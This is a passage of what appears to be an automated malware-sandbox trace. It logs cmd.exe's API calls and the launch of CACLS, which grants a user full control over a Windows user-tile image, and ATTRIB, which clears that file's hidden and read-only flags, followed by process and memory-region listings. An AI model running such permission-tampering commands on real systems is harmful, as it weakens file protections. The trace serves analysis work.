_wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0177.016] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0177.016] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0177.016] _wcsicmp 
(_String1="CACLS", _String2="VERIFY") returned -19 [0177.016] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0177.016] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0177.016] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0177.016] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0177.016] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0177.016] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0177.016] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0177.016] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0177.016] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0177.016] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0177.016] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0177.016] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0177.016] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0177.016] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0177.016] 
_wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0177.016] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0177.016] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0177.016] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0177.016] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0177.017] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0177.017] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0177.017] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0177.017] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0177.017] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0177.017] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0177.017] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0177.017] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0177.017] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0177.017] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0177.017] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0177.017] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0177.017] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0177.017] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0177.017] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0177.017] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0177.017] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0177.017] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0177.017] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0177.017] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0177.017] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0177.017] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 
[0177.017] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0177.017] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0177.017] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0177.017] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0177.017] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0177.017] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0177.018] SetErrorMode (uMode=0x0) returned 0x0 [0177.018] SetErrorMode (uMode=0x1) returned 0x0 [0177.018] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f1e98, lpFilePart=0x24f06c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f06c*="Desktop") returned 0x18 [0177.018] SetErrorMode (uMode=0x0) returned 0x1 [0177.018] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.018] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.023] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.023] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.024] GetLastError () returned 0x2 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.024] GetLastError () returned 0x2 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x24ede8) returned 0x3f2180 [0177.024] FindClose (in: hFindFile=0x3f2180 | out: hFindFile=0x3f2180) returned 1 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.024] GetLastError () returned 0x2 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3f2180 [0177.024] FindClose (in: hFindFile=0x3f2180 | out: hFindFile=0x3f2180) returned 1 [0177.024] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.024] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.024] GetConsoleTitleW (in: lpConsoleTitle=0x24f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.025] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f230 | out: lpAttributeList=0x24f168, lpSize=0x24f230) returned 1 [0177.025] UpdateProcThreadAttribute (in: lpAttributeList=0x24f168, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f168, lpPreviousValue=0x0) returned 1 [0177.025] GetStartupInfoW (in: lpStartupInfo=0x24f124 | out: lpStartupInfo=0x24f124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0177.025] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.026] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS 
\"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f210 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f210*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd50, dwThreadId=0xd64)) returned 1 [0177.040] CloseHandle (hObject=0x4c) returned 1 [0177.040] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.040] GetEnvironmentStringsW () returned 0x3f0308* [0177.040] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0177.040] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0177.222] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f104 | out: lpExitCode=0x24f104*=0x0) returned 1 [0177.222] CloseHandle (hObject=0x50) returned 1 [0177.222] _vsnwprintf (in: _Buffer=0x24f24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f110 | out: _Buffer="00000000") returned 8 [0177.222] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.222] GetEnvironmentStringsW () returned 0x3f2410* [0177.222] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.222] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.222] GetEnvironmentStringsW () returned 0x3f2410* [0177.222] FreeEnvironmentStringsW 
(penv=0x3f2410) returned 1 [0177.223] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f168 | out: lpAttributeList=0x24f168) [0177.223] GetConsoleTitleW (in: lpConsoleTitle=0x24f54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.223] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.223] GetLastError () returned 0x2 [0177.223] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.223] GetLastError () returned 0x2 [0177.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3ee4d8 [0177.224] FindClose (in: hFindFile=0x3ee4d8 | out: hFindFile=0x3ee4d8) returned 1 [0177.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.224] GetLastError () returned 0x2 [0177.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, 
lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3ee4d8 [0177.224] FindClose (in: hFindFile=0x3ee4d8 | out: hFindFile=0x3ee4d8) returned 1 [0177.224] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.224] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.224] GetConsoleTitleW (in: lpConsoleTitle=0x24f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.224] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f230 | out: lpAttributeList=0x24f168, lpSize=0x24f230) returned 1 [0177.224] UpdateProcThreadAttribute (in: lpAttributeList=0x24f168, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f168, lpPreviousValue=0x0) returned 1 [0177.224] GetStartupInfoW (in: lpStartupInfo=0x24f124 | out: lpStartupInfo=0x24f124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0177.224] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.224] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", dwX=0x0, dwY=0x1, 
dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f210 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessInformation=0x24f210*(hProcess=0x4c, hThread=0x50, dwProcessId=0x410, dwThreadId=0xb38)) returned 1 [0177.226] CloseHandle (hObject=0x50) returned 1 [0177.226] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.226] GetEnvironmentStringsW () returned 0x3f2410* [0177.226] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.226] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0177.430] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f104 | out: lpExitCode=0x24f104*=0x0) returned 1 [0177.431] CloseHandle (hObject=0x4c) returned 1 [0177.431] _vsnwprintf (in: _Buffer=0x24f24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f110 | out: _Buffer="00000000") returned 8 [0177.431] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.431] GetEnvironmentStringsW () returned 0x3f2410* [0177.431] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.431] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.431] GetEnvironmentStringsW () returned 0x3f2410* [0177.431] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.431] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f168 | out: lpAttributeList=0x24f168) [0177.431] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.431] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.432] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.432] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.432] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.432] SetConsoleInputExeNameW () returned 0x1 [0177.432] GetConsoleOutputCP () returned 0x1b5 [0177.432] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.432] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.432] exit (_Code=0) Process: id = "318" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c80" os_pid = "0xd50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "317" os_parent_pid = "0xa5c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24519 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24520 start_va = 0x720000 end_va = 0x728fff entry_point = 0x720000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: 
"c:\\windows\\system32\\cacls.exe") Region: id = 24521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24524 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 24525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24527 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24528 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24529 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24530 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 24531 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 24532 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24533 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24534 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24535 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24536 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24537 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 430 os_tid = 0xd64 Thread: id = 431 os_tid = 0xd04 Process: id = "319" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c80" os_pid = "0x410" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "317" os_parent_pid = "0xa5c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" 
[0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24552 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24553 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24554 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24555 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 24556 start_va = 0xf40000 end_va = 0xf46fff entry_point = 0xf40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24557 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24558 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24559 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24560 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24561 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 24562 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24563 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24564 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24565 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 24566 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 24567 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24568 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24569 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24570 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24571 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 24572 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24576 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 